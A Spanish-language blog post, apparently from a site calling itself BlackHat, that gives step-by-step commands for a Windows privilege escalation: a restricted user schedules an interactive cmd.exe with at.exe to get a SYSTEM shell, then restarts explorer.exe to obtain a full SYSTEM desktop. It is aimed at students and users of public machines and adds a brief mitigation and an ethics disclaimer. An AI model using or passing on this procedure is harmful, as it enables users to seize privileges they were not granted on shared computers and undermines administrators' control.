Bien amigos la cosa es otra ves con Windows, bueno aquí presento algo que le será de muchísimo interés a estudiantes y personas que usan maquinas publicas. Se trata de un bugs de los Sistemas Operativos Windows basados en la New Tecnologic (NT) de los Microsoft. Este (bichito) permite que un usuario (restringido) o sea con privilegios limitados ejecute aplicaciones con permisos de una sesión NT AUTHORITY\SYSTEM.
Nota: esta cuenta tiene más privilegios que un Administrador.Pues bien el caso es que el comando AT.EXE que se utiliza para programar tareas ejecuta las aplicaciones bajo licencia del usuario SYSTEM. y asi es como podemos ejecutar el explorador de Windows o una aplicación cualquiera con mas privilegios que el mismísimo Administrador.
Como trabajar con 0-day:
1- Levanta el símbolo del sistema inicio--> ejecutar -- > escribe cmd.exe ---> enter.2- Mira en la barra de tareas la hora local del sistema, (ejemplo 5:35am)
3- Escribes la siguiente línea
C:\ at 23:06 /interactive "cmd.exe"
4- Espera que te aparezca otra ventana de simbolo del Sistema.
5- Cierra la primera y tecla lo que sigue
C:\ taskkill /F /IM explorer.exe
6- Luego esto
C:\ explorer.exe
De esta forma se cargará un nuevo escritorio con permisos de SYSTEM, todo lo que ejecutemos a partir de ahora tendrá permisos de System.
La contra:
Bueno a quien le pueda interesar invalidar este bug puede eliminar la aplicación at.exe en C:\WINDOWS\system32No digo esto para estar en paz con dios y el diablo que se sepa bien si no que uno nunca sabe de parte de quien esta la justicia y mucho menos quien tiene la verdad de la verdad.
Importante !!!
Algo que debes saber:Las maquinas publicas son propiedad social y como mismo se comparte el conocimiento se comparten esos medios.
Nadie tiene el derecho de causar problemas en centros públicos y mucho menos tomarse privilegios no atribuidos con otros fines que no sea el de apoderarse de conocimiento.
BlackHat mantendrá su posición educativa.
Black Hat por Email
Black Hat por Feed
No hay comentarios:
Publicar un comentario